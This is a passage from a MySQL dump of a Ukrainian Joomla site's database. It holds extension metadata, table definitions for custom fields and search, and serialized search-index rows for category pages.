reserved.\",\"authorEmail\":\"support@vinagecko.com\",\"authorUrl\":\"http:\\/\\/VinaGecko.com\",\"version\":\"1.3\",\"description\":\"\\n\\t\\t<div style=\\\"border: 1px solid red; border-radius: 7px; padding: 10px;\\\">\\n\\t\\t<strong>Vina Animations Image Slider<\\/strong> is a free responsive image slider for Joomla 3 with many features: <strong>74 Transition Effects, Unlimited Image.<\\/strong> This module does not use jQuery animations. Only CSS3, because performance matters.<br>\\n\\t\\t<strong>VinaGecko.com<\\/strong> - Premium <a href=\\\"http:\\/\\/vinagecko.com\\/joomla-modules\\\" target=\\\"_blank\\\">Joomla Modules<\\/a>, <a href=\\\"http:\\/\\/vinagecko.com\\/joomla-plugins\\\" target=\\\"_blank\\\">Joomla Plugins<\\/a>, <a href=\\\"http:\\/\\/vinagecko.com\\/joomla-templates\\\" target=\\\"_blank\\\">Joomla Templates<\\/a>.\\n\\t\\t<\\/div>\\n\\t\",\"group\":\"\",\"filename\":\"mod_vina_animations_image_slider\"}','{\"moduleWidth\":\"\",\"moduleHeight\":\"\",\"resizeImage\":\"1\",\"resizeType\":\"1\",\"imageWidth\":\"940\",\"imageHeight\":\"420\",\"captionBlock\":\"1\",\"animationIn\":\"fadeIn\",\"animationOut\":\"fadeOut\",\"stopOnHover\":\"1\",\"loop\":\"1\",\"delay\":\"5000\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10412,0,'m','template','m','',0,1,1,0,'{\"name\":\"m\",\"type\":\"template\",\"creationDate\":\"2020-08-29\",\"author\":\"\\u041d\\u0435\\u0438\\u0437\\u0432\\u0435\\u0441\\u0442\\u043d\\u044b\\u0439\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"Artisteer-generated theme\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"blogLayoutType\":\"default\"}','','',0,'0000-00-00 00:00:00',0,0),(10425,0,'com_phocagallery','component','com_phocagallery','',1,1,0,0,'{\"name\":\"com_phocagallery\",\"type\":\"component\",\"creationDate\":\"02\\/03\\/2021\",\"author\":\"Jan Pavelka (www.phoca.cz)\",\"copyright\":\"Jan Pavelka\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/www.phoca.cz\",\"version\":\"4.4.2\",\"description\":\"COM_PHOCAGALLERY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phocagallery\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10426,0,'mod_phocagallery_image','module','mod_phocagallery_image','',0,1,0,0,'{\"name\":\"mod_phocagallery_image\",\"type\":\"module\",\"creationDate\":\"04\\/01\\/2021\",\"author\":\"Jan Pavelka (www.phoca.cz)\",\"copyright\":\"Jan Pavelka\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/www.phoca.cz\",\"version\":\"4.4.0\",\"description\":\"MOD_PHOCAGALLERY_IMAGE_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_phocagallery_image\"}','{\"phocahead1\":\"MOD_PHOCAGALLERY_IMAGE_CONFIG_GENERAL_SETTINGS_LABEL\",\"category_id\":\"0\",\"image_ordering\":\"1\",\"limit_start\":\"0\",\"limit_count\":\"1\",\"module_link\":\"0\",\"phocahead2\":\"MOD_PHOCAGALLERY_IMAGE_CONFIG_DESIGN_SETTINGS_LABEL\",\"module_type\":\"shadow1\",\"image_size\":\"auto\",\"font_color\":\"#b36b00\",\"display_name\":\"1\",\"display_icon_detail\":\"1\",\"display_icon_download\":\"2\",\"font_size_name\":\"12\",\"char_length_name\":\"15\",\"category_box_space\":\"0\",\"padding_mosaic\":\"3\",\"custom_image_width\":\"\",\"custom_image_height\":\"\",\"minimum_box_width\":\"\",\"phocagallery_module_width\":\"\",\"phocahead3\":\"MOD_PHOCAGALLERY_IMAGE_CONFIG_DEFAULT_DESCRIPTION_SETTINGS_LABEL\",\"spacer4\":\"MOD_PHOCAGALLERY_IMAGE_DETAIL_WINDOW_WARNING\",\"detail_window\":\"0\",\"modal_box_overlay_color\":\"#000000\",\"modal_box_overlay_opacity\":\"0.3\",\"modal_box_border_color\":\"#6b6b6b\",\"modal_box_border_width\":\"2\",\"sb_slideshow_delay\":\"5\",\"highslide_class\":\"rounded-white\",\"highslide_opacity\":\"0\",\"highslide_outline_type\":\"rounded-white\",\"highslide_fullimg\":\"0\",\"highslide_close_button\":\"0\",\"highslide_slideshow\":\"1\",\"highslide_description\":\"1\",\"jak_slideshow_delay\":\"5\",\"spacer10\":\"MOD_PHOCAGALLERY_IMAGE_JAK_LIGHTBOX_ORIENTATION_WARNING\",\"jak_orientation\":\"none\",\"jak_description\":\"1\",\"jak_description_height\":\"10\",\"display_description_detail\":\"0\",\"display_title_description\":\"0\",\"detail_buttons\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10435,0,'Regular Labs Library','library','regularlabs','',0,1,1,0,'{\"name\":\"Regular Labs Library\",\"type\":\"library\",\"creationDate\":\"May 2021\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2021 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/regularlabs.com\",\"version\":\"21.5.22934\",\"description\":\"Regular Labs Library - used by Regular Labs extensions\",\"group\":\"\",\"filename\":\"regularlabs\"}','{}','','',0,'0000-00-00 00:00:00',0,0);
/*!40000 ALTER TABLE `fw3gt_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_fields`
--

DROP TABLE IF EXISTS `fw3gt_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_fields` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `group_id` int(10) unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `label` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `default_value` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'text',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `required` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `fieldparams` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_created_user_id` (`created_user_id`),
  KEY `idx_access` (`access`),
  KEY `idx_context` (`context`(191)),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_fields`
--

LOCK TABLES `fw3gt_fields` WRITE;
/*!40000 ALTER TABLE `fw3gt_fields` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_fields_categories`
--

DROP TABLE IF EXISTS `fw3gt_fields_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_fields_categories` (
  `field_id` int(11) NOT NULL DEFAULT '0',
  `category_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`field_id`,`category_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_fields_categories`
--

LOCK TABLES `fw3gt_fields_categories` WRITE;
/*!40000 ALTER TABLE `fw3gt_fields_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_fields_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_fields_groups`
--

DROP TABLE IF EXISTS `fw3gt_fields_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_fields_groups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_created_by` (`created_by`),
  KEY `idx_access` (`access`),
  KEY `idx_context` (`context`(191)),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_fields_groups`
--

LOCK TABLES `fw3gt_fields_groups` WRITE;
/*!40000 ALTER TABLE `fw3gt_fields_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_fields_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_fields_values`
--

DROP TABLE IF EXISTS `fw3gt_fields_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_fields_values` (
  `field_id` int(10) unsigned NOT NULL,
  `item_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'Allow references to items which have strings as ids, eg. none db systems.',
  `value` text COLLATE utf8mb4_unicode_ci NOT NULL,
  KEY `idx_field_id` (`field_id`),
  KEY `idx_item_id` (`item_id`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_fields_values`
--

LOCK TABLES `fw3gt_fields_values` WRITE;
/*!40000 ALTER TABLE `fw3gt_fields_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_fields_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_filters`
--

DROP TABLE IF EXISTS `fw3gt_finder_filters`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_filters` (
  `filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL,
  `created_by_alias` varchar(255) NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `map_count` int(10) unsigned NOT NULL DEFAULT '0',
  `data` mediumtext NOT NULL,
  `params` longtext,
  PRIMARY KEY (`filter_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_filters`
--

LOCK TABLES `fw3gt_finder_filters` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_filters` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_finder_filters` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links`
--

DROP TABLE IF EXISTS `fw3gt_finder_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links` (
  `link_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) NOT NULL,
  `route` varchar(255) NOT NULL,
  `title` varchar(400) DEFAULT NULL,
  `description` text,
  `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `md5sum` varchar(32) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `state` int(5) DEFAULT '1',
  `access` int(5) DEFAULT '0',
  `language` varchar(8) NOT NULL,
  `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `list_price` double unsigned NOT NULL DEFAULT '0',
  `sale_price` double unsigned NOT NULL DEFAULT '0',
  `type_id` int(11) NOT NULL,
  `object` mediumblob NOT NULL,
  PRIMARY KEY (`link_id`),
  KEY `idx_type` (`type_id`),
  KEY `idx_md5` (`md5sum`),
  KEY `idx_url` (`url`(75)),
  KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
  KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`),
  KEY `idx_title` (`title`(100))
) ENGINE=InnoDB AUTO_INCREMENT=4958 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links`
--

LOCK TABLES `fw3gt_finder_links` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links` VALUES (4538,'index.php?option=com_content&view=category&id=9','index.php?option=com_content&view=category&id=9','Відомості про район','','2020-08-30 13:15:18','0d76a7790dd1efed3f4c5fb087fc5a50',1,0,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2014-09-16 09:36:35','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:1:\"9\";s:5:\"alias\";s:19:\"2010-06-05-12-55-45\";s:7:\"summary\";s:0:\"\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"0000-00-00 00:00:00\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:10:\"page_title\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:2:\"15\";s:9:\"parent_id\";s:1:\"1\";s:5:\"level\";s:1:\"1\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:21:\"9:2010-06-05-12-55-45\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:15:\"/index.php?id=9\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=category&id=9\";s:5:\"route\";s:47:\"index.php?option=com_content&view=category&id=9\";s:5:\"title\";s:36:\"Відомості про район\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-09-16 09:36:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4539,'index.php?option=com_content&view=category&id=12','index.php?option=com_content&view=category&id=12','Істричний нарис','','2020-08-30 13:15:18','e44c2d0ae0cfd4bc64f02822903b1133',1,0,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2014-09-16 09:36:35','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:2:\"12\";s:5:\"alias\";s:19:\"2010-06-06-03-57-58\";s:7:\"summary\";s:0:\"\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"0000-00-00 00:00:00\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:10:\"page_title\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:2:\"16\";s:9:\"parent_id\";s:1:\"9\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:22:\"12:2010-06-06-03-57-58\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:16:\"/index.php?id=12\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=category&id=12\";s:5:\"route\";s:48:\"index.php?option=com_content&view=category&id=12\";s:5:\"title\";s:29:\"Істричний нарис\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-09-16 09:36:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4540,'index.php?option=com_content&view=category&id=14','index.php?option=com_content&view=category&id=14','Відеоогляд','','2020-08-30 13:15:18','bcb77947ab5eddc40b930db9fec1e7bc',1,0,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2014-09-16 09:36:35','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:2:\"14\";s:5:\"alias\";s:19:\"2010-06-06-09-34-01\";s:7:\"summary\";s:0:\"\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"0000-00-00 00:00:00\";s:11:\"modified_by\";s:1:\"0\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:10:\"page_title\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:2:\"18\";s:9:\"parent_id\";s:1:\"9\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:22:\"14:2010-06-06-09-34-01\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:16:\"/index.php?id=14\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=category&id=14\";s:5:\"route\";s:48:\"index.php?option=com_content&view=category&id=14\";s:5:\"title\";s:20:\"Відеоогляд\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-09-16 09:36:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4541,'index.php?option=com_content&view=category&id=82','index.php?option=com_content&view=category&id=82','Фотогалерея','','2020-08-30 13:15:18','36c678155c2891c9c4908c2436dae0d6',1,0,1,'*','0000-00-00 00:00:00','0000-00-00 00:00:00','2015-12-26 12:15:35','0000-00-00 00:00:00',0,0,2,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:18:{s:2:\"id\";s:2:\"82\";s:5:\"alias\";s:12:\"fotogalereya\";s:7:\"summary\";s:0:\"\";s:9:\"extension\";s:11:\"com_content\";s:10:\"created_by\";s:3:\"430\";s:8:\"modified\";s:19:\"2015-12-26 12:15:38\";s:11:\"modified_by\";s:3:\"430\";s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"author\";s:0:\"\";s:6:\"robots\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:3:\"lft\";s:2:\"24\";s:9:\"parent_id\";s:1:\"9\";s:5:\"level\";s:1:\"2\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":3:{s:15:\"category_layout\";s:0:\"\";s:5:\"image\";s:0:\"\";s:9:\"image_alt\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:4:\"slug\";s:15:\"82:fotogalereya\";s:6:\"layout\";s:8:\"category\";s:10:\"metaauthor\";N;s:4:\"path\";s:16:\"/index.php?id=82\";}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:4:\"link\";i:4;s:7:\"metakey\";i:5;s:8:\"metadesc\";i:6;s:10:\"metaauthor\";i:7;s:6:\"author\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:2:{s:4:\"Type\";a:1:{s:8:\"Category\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:8:\"Category\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=category&id=82\";s:5:\"route\";s:48:\"index.php?option=com_content&view=category&id=82\";s:5:\"title\";s:22:\"Фотогалерея\";s:11:\"description\";s:0:\"\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"0000-00-00 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-12-26 12:15:35\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:2;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4543,'index.php?option=com_content&view=category&id=131','index.php?option=com_content&view=category&id=131','Фотогалерея',' ','2020-08-30 